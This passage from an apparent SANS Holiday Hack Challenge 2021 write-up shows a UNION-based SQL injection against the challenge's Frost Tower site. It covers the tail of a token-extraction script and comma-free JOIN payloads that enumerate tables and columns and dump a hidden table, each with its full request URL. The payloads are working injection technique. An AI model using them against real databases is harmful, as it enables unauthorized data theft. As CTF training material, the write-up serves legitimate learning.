                &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;end&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flush&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;continue&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; python3 sqli.py
&lt;span class="go"&gt;Token: 1xafy85lw5dh5zancif61e8qaghdgbxy&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The Frost Tower admin dashboard. We can see we are logged in as root&amp;#64;localhost. We can manage other users." class="align-center" src="/images/sans-christmas-challenge-2021/frost_tower_root.png" /&gt;
&lt;p&gt;Yay, we are logged in as &lt;code&gt;root&amp;#64;localhost&lt;/code&gt;! But we don't care. Indeed,
we don't get access to any new information. I &lt;em&gt;almost&lt;/em&gt; fell down this rabbit
hole this year, but I decided to think outside the box.&lt;/p&gt;
&lt;p&gt;(Hello to &lt;a class="reference external" href="https://twitter.com/januszjasinski"&gt;Janusz Jasinski&lt;/a&gt;,
&lt;a class="reference external" href="https://noobintheshell.com/"&gt;noobintheshell&lt;/a&gt;, and Chewwie that were writing
their write-ups the same time I was writing mine.)&lt;/p&gt;
&lt;p&gt;I followed this trail because in the source code that we were given, we have
the SQL schema, and only three tables are created: &lt;code&gt;uniquecontact&lt;/code&gt;,
&lt;code&gt;users&lt;/code&gt;, and &lt;code&gt;emails&lt;/code&gt;. But there is in fact another table created
in the live environment.&lt;/p&gt;
&lt;p&gt;We can try and get the list of tables by abusing our &lt;code&gt;UNION&lt;/code&gt;-based SQL
injection. However, we were lucky in our previous endeavour: the number of
columns was the same in the &lt;code&gt;uniquecontact&lt;/code&gt; and &lt;code&gt;users&lt;/code&gt; tables,
therefore we could just use &lt;code&gt;UNION SELECT *&lt;/code&gt; in our Python code. However,
we won't be so lucky with all the tables we will look up. The problem is that
we can't have any commas in our injection syntax: remember that the
&lt;code&gt;detail&lt;/code&gt; endpoint splits on commas, so that would break our injection
syntax.&lt;/p&gt;
&lt;p&gt;So I searched how to perform a SQL injection without using commas, and I found
&lt;a class="reference external" href="https://security.stackexchange.com/a/118335"&gt;this StackExchange answer&lt;/a&gt;
which gives a working syntax, relying on &lt;code&gt;JOIN&lt;/code&gt; statements. It leads to a
pretty ugly SQL injection syntax, but it works!&lt;/p&gt;
&lt;p&gt;We will inject the &lt;code&gt;id&lt;/code&gt; parameter with the following value:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;UNION&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB0&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;information_schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tables&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;table_schema&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="ss"&gt;&amp;quot;encontact&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB1&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB2&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB3&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB4&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB5&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;uniquecontact&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB7&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;33&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can see that I query for the tables in database &lt;code&gt;encontact&lt;/code&gt; in the
second &lt;code&gt;JOIN&lt;/code&gt;, with the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;information_schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tables&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;table_schema&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="ss"&gt;&amp;quot;encontact&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can also see that I query for an &lt;code&gt;id&lt;/code&gt; in &lt;code&gt;uniquecontact&lt;/code&gt; in the
last &lt;code&gt;JOIN&lt;/code&gt;, with the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;uniquecontact&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB7&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;33&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This is to make sure that we don't break the end of the &amp;quot;legitimate&amp;quot; SQL
syntax. I use &lt;code&gt;id=33&lt;/code&gt; because we can see in the SQL schema that it's the
auto increment value, so the record with this ID should exist:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;uniquecontact&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt; &lt;span class="n"&gt;AUTO_INCREMENT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;full_name&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;255&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;email&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;255&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;phone&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;country&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;255&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;date_created&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;date_update&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ENGINE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;InnoDB&lt;/span&gt; &lt;span class="n"&gt;AUTO_INCREMENT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;33&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;CHARSET&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;latin1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The other &lt;code&gt;JOIN&lt;/code&gt; statements are here to make sure that both sides of our
&lt;code&gt;UNION&lt;/code&gt; have the same number of columns.&lt;/p&gt;
&lt;p&gt;The vulnerable code will generate the following SQL query:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;uniquecontact&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;UNION&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB0&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;information_schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tables&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;table_schema&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="ss"&gt;&amp;quot;encontact&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB1&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB2&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB3&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB4&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB5&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;uniquecontact&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB7&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;33&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=?&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The last &lt;code&gt;OR id=?&lt;/code&gt; is added by the code, and this placeholder is binded
to a &lt;code&gt;0&lt;/code&gt;, so we don't care about it.&lt;/p&gt;
&lt;p&gt;Here's the final URL:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://staging.jackfrosttower.com/detail/-1%20UNION%20SELECT%20*%20FROM%20(SELECT%201)TB0%20JOIN%20(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=%22encontact%22)TB1%20JOIN%20(SELECT%202)TB2%20JOIN%20(SELECT%203)TB3%20JOIN%20(SELECT%204)TB4%20JOIN(SELECT%205)TB5%20JOIN%20(SELECT%20id%20FROM%20uniquecontact)TB7%20WHERE%20id=33,0"&gt;https://staging.jackfrosttower.com/detail/-1%20UNION%20SELECT%20*%20FROM%20(SELECT%201)TB0%20JOIN%20(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=%22encontact%22)TB1%20JOIN%20(SELECT%202)TB2%20JOIN%20(SELECT%203)TB3%20JOIN%20(SELECT%204)TB4%20JOIN(SELECT%205)TB5%20JOIN%20(SELECT%20id%20FROM%20uniquecontact)TB7%20WHERE%20id=33,0&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We put a &lt;code&gt;,0&lt;/code&gt; at the end to introduce a comma in our parameter, to
trigger the SQL injection:&lt;/p&gt;
&lt;img alt="The result of the previous SQL injection. We see the tree known tables, and see an additional one called todo." class="align-center" src="/images/sans-christmas-challenge-2021/frost_tower_sqli_tables.png" /&gt;
&lt;p&gt;Ha! Just as suspected, an additional table: &lt;code&gt;todo&lt;/code&gt;. Given its name, this
must be the table were the information we're looking for is stored.&lt;/p&gt;
&lt;p&gt;By using the same technique, we can recover the columns of &lt;code&gt;todo&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;UNION&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB0&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;column_name&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;information_schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;columns&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="ss"&gt;&amp;quot;todo&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB1&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB2&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB3&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB4&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB5&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;uniquecontact&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB7&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;33&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now you can see that we select the column name with the following request in
the second &lt;code&gt;JOIN&lt;/code&gt; statement:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;column_name&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;information_schema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;columns&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="ss"&gt;&amp;quot;todo&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's the URL:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://staging.jackfrosttower.com/detail/-1%20UNION%20SELECT%20*%20FROM%20(SELECT%201)TB0%20JOIN%20(SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name=%22todo%22)TB1%20JOIN%20(SELECT%202)TB2%20JOIN%20(SELECT%203)TB3%20JOIN%20(SELECT%204)TB4%20JOIN(SELECT%205)TB5%20JOIN%20(SELECT%20id%20FROM%20uniquecontact)TB7%20WHERE%20id=33,0"&gt;https://staging.jackfrosttower.com/detail/-1%20UNION%20SELECT%20*%20FROM%20(SELECT%201)TB0%20JOIN%20(SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name=%22todo%22)TB1%20JOIN%20(SELECT%202)TB2%20JOIN%20(SELECT%203)TB3%20JOIN%20(SELECT%204)TB4%20JOIN(SELECT%205)TB5%20JOIN%20(SELECT%20id%20FROM%20uniquecontact)TB7%20WHERE%20id=33,0&lt;/a&gt;&lt;/p&gt;
&lt;img alt="The result of the previous SQL injection. We see the column names of the todo tables. They are id, note, and completed." class="align-center" src="/images/sans-christmas-challenge-2021/frost_tower_sqli_columns.png" /&gt;
&lt;p&gt;Now we know the names of &lt;code&gt;todo&lt;/code&gt;'s columns: &lt;code&gt;id&lt;/code&gt;, &lt;code&gt;note&lt;/code&gt;, and
&lt;code&gt;completed&lt;/code&gt;. With that, we can finally get the content of the table,
with the following syntax:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;UNION&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB0&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;note&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;todo&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB1&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB2&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB3&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB4&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB5&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;uniquecontact&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;TB7&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;33&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's the URL:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://staging.jackfrosttower.com/detail/-1%20UNION%20SELECT%20*%20FROM%20(SELECT%201)TB0%20JOIN%20(SELECT%20note%20FROM%20todo)TB1%20JOIN%20(SELECT%202)TB2%20JOIN%20(SELECT%203)TB3%20JOIN%20(SELECT%204)TB4%20JOIN(SELECT%205)TB5%20JOIN%20(SELECT%20id%20FROM%20uniquecontact)TB7%20WHERE%20id=33,0"&gt;https://staging.jackfrosttower.com/detail/-1%20UNION%20SELECT%20*%20FROM%20(SELECT%201)TB0%20JOIN%20(SELECT%20note%20FROM%20todo)TB1%20JOIN%20(SELECT%202)TB2%20JOIN%20(SELECT%203)TB3%20JOIN%20(SELECT%204)TB4%20JOIN(SELECT%205)TB5%20JOIN%20(SELECT%20id%20FROM%20uniquecontact)TB7%20WHERE%20id=33,0&lt;/a&gt;&lt;/p&gt;
